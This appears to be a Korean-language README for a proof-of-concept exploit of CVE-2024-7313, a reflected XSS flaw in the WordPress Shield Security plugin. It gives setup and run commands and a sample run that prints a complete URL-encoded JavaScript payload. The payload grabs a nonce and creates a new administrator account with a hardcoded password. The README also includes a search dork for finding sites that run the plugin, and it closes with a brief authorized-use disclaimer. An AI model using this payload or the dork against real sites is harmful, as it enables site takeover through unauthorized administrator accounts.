
WordPress 플러그인 Shield Security < 20.0.6를 통한 XSS에서 무단 관리자 계정 생성에 대한 커스텀 개념 증명
이 저장소는 WordPress용 Shield Security 플러그인(버전 20.0.6 미만)의 반사형 XSS 취약점을 익스플로잇하기 위한 Python PoC 스크립트를 포함합니다. 이 취약점(CVE-2024-7313)을 통해 공격자는 대상에 맞춤화된 악성 링크를 생성할 수 있으며, 관리자가 이를 클릭하면 XSS를 통해 승인되지 않은 관리자 계정이 생성됩니다. 이 스크립트는 취약한 설치를 자동으로 감지하고 취약점을 익스플로잇하기 위한 페이로드를 생성합니다.
| 항목 | 내용 |
|---|---|
| CVE | CVE-2024-7313 |
| 플러그인 | Shield Security < 20.0.6 |
| 심각도 | 높음 |
| 영향을 받는 시스템 | Shield Security 플러그인 버전 < 20.0.6을 사용하는 WordPress 웹사이트 |
| 공격 유형 | 반사형 크로스 사이트 스크립팅 (XSS) |
| 공개일 | 2024년 8월 7일 |
| OWASP TOP-10 | A7: 크로스 사이트 스크립팅 (XSS) |
requests 및 beautifulsoup4 라이브러리필요한 라이브러리를 설치합니다:
pip install requests beautifulsoup4
git clone https://github.com/Wayne-Ker/CVE-2024-7313.git
cd CVE-2024-7313
python3 exploit.py <target_url>
예시:
python3 exploit.py http://127.0.0.1
새 관리자 사용자에 필요한 세부 정보(사용자 이름, 이메일, 이름, 성)를 입력하면 스크립트가 페이로드 URL을 생성합니다. 이 URL을 브라우저에 붙여넣어 반사형 XSS 공격을 실행하면 WordPress 사이트에 새로운 관리자 사용자가 생성됩니다.
#############################################################################
# #
# #
# ______ _______ ____ ___ ____ _ _ _____ _____ _ _____ #
# / ___\ \ / | ____| |___ \ / _ |___ \| || | |___ |___ // |___ / #
# | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ / / |_ \| | |_ \ #
# | |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ / ___) | |___) | #
# \____| \_/ |_____| |_____|\___|_____| |_| /_/ |____/|_|____/ #
# #
# Shield Security Plugin Vulnerability (CVE-2024-7313) #
# Reflected XSS in WordPress Shield Security Plugin #
# Versions Affected: < 20.0.6 #
# Risk: High #
# Developed by: Wayne-Kerr #
# Published: August 7, 2024 #
#############################################################################
Shield Security version is vulnerable. Let's continue.
Enter username: fakename
Enter email: [email protected]
Enter first name: Haxor
Enter last name: test
Using hardcoded password: HaxorStrongAFPassword123!!
Generated XSS Payload URL: http://127.0.0.1/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=%3Cscript%3Evar%20xhrNonce%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhrNonce.open%28%27GET%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhrNonce.onload%20%3D%20function%28%29%20%7B%20if%20%28xhrNonce.status%20%3D%3D%3D%20200%29%20%7B%20var%20nonce%20%3D%20xhrNonce.responseText.match%28/name%3D%22_wpnonce_create-user%22%20value%3D%22%28%5Ba-zA-Z0-9%5D%2B%29%22/%29%5B1%5D%3B%20var%20xhr%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhr.open%28%27POST%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhr.setRequestHeader%28%27Content-Type%27%2C%20%27application/x-www-form-urlencoded%27%29%3B%20xhr.setRequestHeader%28%27Referer%27%2C%20%27http%3A//127.0.0.1/wp-admin/user-new.php%27%29%3B%20xhr.setRequestHeader%28%27Origin%27%2C%20%27http%3A//127.0.0.1%27%29%3B%20var%20params%20%3D%20%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%20%2B%20nonce%20%2B%20%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%26user_login%3Dnick%26email%3Dnick%2540test.com%26first_name%3Dnick%26last_name%3Dtest%26url%3Dtest%26pass1%3DHaxorStrongAFPassword123%2521%2521%26pass2%3DHaxorStrongAFPassword123%2521%2521%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B%20xhr.send%28params%29%3B%20xhr.onload%20%3D%20function%28%29%20%7B%20if%20%28xhr.status%20%3D%3D%20200%29%20%7B%20console.log%28%27Admin%20user%20created%20successfully%27%29%3B%20window.location.href%20%3D%20%27http%3A//127.0.0.1/wp-admin/admin.php%3Fpage%3Dicwp-wpsf-plugin%26nav%3Ddashboard%26nav_sub%3Doverview%27%3B%20%7D%20else%20%7B%20console.log%28%27Error%20occurred%3A%20%27%20%2B%20xhr.statusText%29%3B%20%7D%20%7D%3B%20%7D%20else%20%7B%20console.log%28%27Error%20fetching%20nonce%3A%20%27%20%2B%20xhrNonce.statusText%29%3B%20%7D%20%7D%3B%20xhrNonce.send%28%29%3B%3C/script%3E
생성된 XSS 페이로드 URL에 접속하면 익스플로잇이 실행되고 대상 WordPress 사이트에 새로운 관리자 사용자가 생성됩니다.
다음을 실행하여 도움말 메뉴에 접근할 수 있습니다:
python3 exploit.py -h
취약한 플러그인을 사용하는 웹사이트를 식별하려면 다음 dork를 사용할 수 있습니다:
inurl:"/wp-content/plugins/wp-simple-firewall/"
이렇게 하면 Shield Security 플러그인이 설치된 웹사이트를 찾을 수 있습니다. 버전 번호는 공개적으로 표시되지 않으므로 수동 테스트가 필요할 수 있습니다.
wp-login.php 페이지의 응답을 검사하여 대상 WordPress 설치가 취약한 버전의 Shield Security 플러그인을 사용하는지 확인합니다.이 도구는 교육 목적으로만 제공되며 승인된 침투 테스트 환경에서만 사용해야 합니다. 소유하지 않은 시스템에 대한 무단 접근 또는 사용은 불법입니다. 저자는 이 도구의 오용에 대해 책임을 지지 않습니다.
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다.